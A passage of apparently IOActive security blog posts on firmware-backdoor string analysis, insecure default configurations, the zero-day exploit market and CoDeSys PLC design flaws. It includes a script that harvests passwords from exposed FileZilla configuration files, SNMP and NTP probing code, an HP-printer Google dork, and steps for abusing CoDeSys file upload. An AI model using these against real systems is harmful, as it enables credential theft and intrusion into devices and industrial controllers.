We also want to avoid the false positives produced by symbols. To do this we detect symbols heuristically and ‘normalize’ them by summing the entropy for each of its tokens rather than the symbol as a whole.
These features help us distinguish strings that look like natural language words or something more interesting … such as undocumented passwords.
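
A toy version of both passes (the neighbor filter and the entropy scorer) is sketched below; the window size, threshold, and training corpus are placeholders, and this scorer averages per-transition surprisal along the string rather than computing the full stationary-distribution formula:

import math
from collections import defaultdict

def levenshtein(a, b):
    # Classic dynamic-programming edit distance.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1,
                           prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def isolated(strings, window=8, threshold=0.6):
    # Keep strings that resemble none of their neighbors inside the window.
    keep = []
    for i, s in enumerate(strings):
        lo, hi = max(0, i - window), min(len(strings), i + window + 1)
        near = strings[lo:i] + strings[i + 1:hi]
        if all(levenshtein(s, n) / max(len(s), len(n), 1) > threshold
               for n in near):
            keep.append(s)
    return keep

def transition_model(corpus):
    # Character-bigram probabilities estimated from a wordlist.
    counts = defaultdict(lambda: defaultdict(int))
    for word in corpus:
        for a, b in zip(word, word[1:]):
            counts[a][b] += 1
    return {a: {b: n / sum(nxt.values()) for b, n in nxt.items()}
            for a, nxt in counts.items()}

def entropy_rate(s, model, floor=1e-6):
    # Average surprisal per transition; high values look "password-like".
    if len(s) < 2:
        return 0.0
    bits = sum(-math.log2(model.get(a, {}).get(b, floor))
               for a, b in zip(s, s[1:]))
    return bits / (len(s) - 1)

Run against the example dump above, a string like Xi$11ksMu8!Lma survives the neighbor filter and scores far higher under entropy_rate than GetSrvAddressById or Decompressing kernel.
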
The following image shows a Stringfighter analysis of the TURCK BL20 firmware. The first string in red is highlighted because the tool detected that it is interesting.
In this case it was an undocumented password, which we eventually confirmed by analyzing the firmware.
The following image shows a Stringfighter analysis of the Schneider NOE 771 firmware. It revealed several backdoor passwords (VxWorks hashes). Some of these backdoor passwords appear in red.

Stringfighter is still a proof-of-concept prototype. We are still testing the ideas behind this tool. But it has exceeded our initial expectations and has detected backdoors in several devices. The TURCK backdoor identified in the CERT advisory will not be the last one identified by IOActive Labs. See you in the next advisory!
INSIGHTS | February 6, 2013

The Anatomy of Unsecure Configuration: Reality Bites

As a penetration tester, I encounter interesting problems with network devices and software. The most common problems that I notice in my work are configuration issues. In today’s security environment, we can accept that a zero-day exploit results in system compromise because details of the vulnerability were unknown earlier. But, what about security issues and problems that have been around for a long time and can’t seem to be eradicated completely? I believe the existence of these types of issues shows that too many administrators and developers are not paying serious attention to the general principles of computer security. I am not saying everyone is at fault, but many people continue to make common security mistakes. There are many reasons for this, but the major ones are:

  • Time constraints: This is hard to imagine, because an administrator’s primary job is to manage and secure the network. For example: How long does it take to configure and secure a network printer? If you ask me, it should not take much time to evaluate and configure secure device properties unless the network has significant complex requirements. But, even if there are complex requirements, it is worth investing the time to make it harder for bad guys to infiltrate the network.
  • Ignorance, fear, and a ‘don’t care’ attitude: This is a human problem. I have seen many network devices that are not touched or reconfigured for years and administrators often forget about them. When I have discussed this with administrators they argued that secure reconfiguration might impact the reliability and performance of the device. As a result, they prefer to maintain the current functionality but at the risk of an insecure configuration.
  • Problems understanding the issue: If complex issues are hard to understand, then easy problems should be easy to manage, right? But it isn’t like that in the real world of computer security. For example, every software product or network device is accompanied by manuals or help files. How many of us spend even a few minutes reading the security sections of these documents? The people who are cautious about security read these sections, but the rest just want to enjoy the device or software’s functionality. Is it so difficult to read the security documentation that is provided? I don’t think so. For a reasonable security assessment of any new product or software, reading the manuals is one key to impressive results. We cannot simply say we don’t understand the issue, and if we ignore the most basic security guidance, then attackers have no hurdles in exploiting the most basic known security issues.

Default Configuration – Basic Authentication

Here are a number of examples to support this discussion:

The majority of network devices can be accessed using Simple Network Management Protocol (SNMP) and community strings that typically act as passwords to extract sensitive information from target systems. In fact, weak community strings are used in too many devices across the Internet. Tools such as snmpwalk and snmpenum make the process of SNMP enumeration easy for attackers. How difficult is it for administrators to change default SNMP community strings and configure more complex ones? Seriously, it isn’t that hard.

A number of devices such as routers use the Network Time Protocol (NTP) over packet-switched data networks to synchronize time services between systems. The basic problem with the default configuration of NTP services is that NTP is enabled on all active interfaces. If any interface exposed on the Internet listens on UDP port 123, a remote user can easily execute NTP readvar queries using ntpq to gain potential information about the target server, including the NTP software version, operating system, peers, and so on.
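
Both of these defaults (SNMP community strings and exposed NTP readvar) are trivially checked with the standard net-snmp and ntp command-line tools. A sketch, with the community strings and host names as examples only:

import subprocess

DEFAULT_COMMUNITIES = ("public", "private")   # the classic defaults

def check_snmp(host):
    # Try default community strings with net-snmp's snmpwalk.
    for community in DEFAULT_COMMUNITIES:
        r = subprocess.run(["snmpwalk", "-v2c", "-c", community, host, "system"],
                           capture_output=True, text=True, timeout=15)
        if r.returncode == 0 and r.stdout.strip():
            print(host, "answers SNMP with community", repr(community))

def check_ntp(host):
    # Ask for readvar output (version, OS, peers) with ntpq.
    r = subprocess.run(["ntpq", "-c", "readvar", host],
                       capture_output=True, text=True, timeout=15)
    if r.returncode == 0 and r.stdout.strip():
        print(host, "leaks NTP readvar data:\n" + r.stdout)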

Unauthorized access to multiple components and software configuration files is another big problem. This is not only a device and software configuration problem, but also a byproduct of design chaos, i.e., the way different network devices are designed and managed in their default state. Too many devices on the Internet allow guests to obtain potentially sensitive information using anonymous or direct access. In addition, one has to wonder how well administrators understand and care about security if they simply allow configuration files to be downloaded from target servers. For example, I recently conducted a small test to verify the presence of the file FileZilla.xml, which sets the properties of FileZilla FTP servers, and found that a number of target servers allow this configuration file to be downloaded without any authorization and authentication controls. This would allow attackers to gain direct access to these FileZilla FTP servers because the passwords are embedded in these configuration files.
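
Harvesting such an exposed config is equally mechanical. In the sketch below, the URL path and the XML element names are assumptions from memory of the FileZilla format, so verify them against a real file:

import requests
import xml.etree.ElementTree as ET

def grab_filezilla_creds(base_url):
    # Fetch an exposed FileZilla config and pull out embedded user passwords.
    r = requests.get(base_url + "/FileZilla.xml", timeout=10)  # example path
    if r.status_code != 200:
        return []
    root = ET.fromstring(r.content)
    creds = []
    for user in root.iter("User"):             # <User Name="..."> blocks
        for opt in user.iter("Option"):
            if opt.get("Name") == "Pass":      # password option (assumed name)
                creds.append((user.get("Name"), opt.text))
    return creds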

FileZilla Configuration File with Password

It is really hard to imagine that anyone would deploy sensitive files containing usernames and passwords on remote servers that are exposed on the network. What results do you expect when you find these types of configuration issues?

 

XLS File Containing Credentials for Third-party Resources
The presence of multiple administration interfaces widens the attack surface because every single interface exposes different attack vectors. A number of network-based devices have SSH, Telnet, FTP, and Web administration interfaces. The default installation of a network device activates at least two or three different interfaces for remote management. This allows attackers to attack network devices by exploiting inherent weaknesses in the protocols used. In addition, the presence of default credentials can further ease the process of exploitation. For example, it is easy to find a large number of unmanaged network devices on the Internet without proper authentication and authorization.

Cisco Catalyst – Insecure Interface
How can we forget about backend databases? The presence of default and weak passwords for the MS SQL system administrator account is still a valid configuration that can be found in the internal networks of many organizations. For example, network proxies that require backend databases are configured with default and weak passwords. In many cases administrators think internal network devices are more secure than external devices. But what happens if an attacker finds a way to penetrate the internal network?
The simple answer is: game over. Integrated web applications with backend databases using default configurations are an “easy walk in the park” for attackers. For example, the following insecure XAMPP installation would be devastating.

XAMPP Security – Web Page
The security community recently encountered an interesting configuration issue in the GitHub repository (http://www.securityweek.com/github-search-makes-easy-discovery-encryption-keys-passwords-source-code), which resulted in the disclosure of SSH keys on the Internet. The point is that when you own an account or repository on public servers, all administrator responsibilities fall on your shoulders. You cannot blame the service provider, GitHub in this case. If users upload their private SSH keys to the repository, then whom can you blame? This is a big problem, and developers continue to expose sensitive information in their public repositories, even though Git documentation shows how to secure and manage sensitive data.
Another interesting finding shows that with Google Dorks (targeted search queries), the Google search engine exposed thousands of HP printers on the Internet (http://port3000.co.uk/google-has-indexed-thousands-of-publicly-acce). The search string “inurl:hp/device/this.LCDispatcher?nav=hp.Print” is all you need to gain access to these HP printers. As I asked at the beginning of this post, “How long does it take to secure a printer?” Although this issue is not new, the amazing part is that it still persists.
The existence of vulnerabilities and patches is a completely different issue than the security issues that result from default configurations and poor administration. Either we know the security posture of the devices and software on our networks but are being careless in deploying them securely, or we do not understand security at all. Insecure and default configurations make the hacking process easier. Many people realize this after they have been hacked and by then the damage has already been done to both reputations and businesses.
This post is just a glimpse into security consciousness, or the lack of it. We have to be more security conscious today because attempts to hack into our networks are almost inevitable. I think we need to be a bit more paranoid and much more vigilant about security.

INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is”, regardless of the question’s particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices of what the exploits are retailing for. That’s because of my elusive answer above… I know of some researchers with their own private repository of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four-times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending for something that’ll most likely sit on the shelf and expire into uselessness before it could be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each lying on its side rusting and corroding away, having never been used – it finally hit me: governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly six-figure wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.

INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.
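
Since the ladder logic on our Wago target was plain compiled x86, even a few lines of Capstone are enough to start poking at a logic file. Treat the offset here as illustrative: the real file places its code after the format’s own header, so skip that in practice:

from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def dump_ladder(path, code_offset=0, size=256):
    # Disassemble the start of a compiled CoDeSys ladder logic file.
    # code_offset=0 is an assumption; adjust past the real header.
    with open(path, "rb") as f:
        f.seek(code_offset)
        code = f.read(size)
    md = Cs(CS_ARCH_X86, CS_MODE_32)   # the Wago target was 32-bit x86
    for insn in md.disasm(code, code_offset):
        print("%08x: %s %s" % (insn.address, insn.mnemonic, insn.op_str))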

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

 I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.
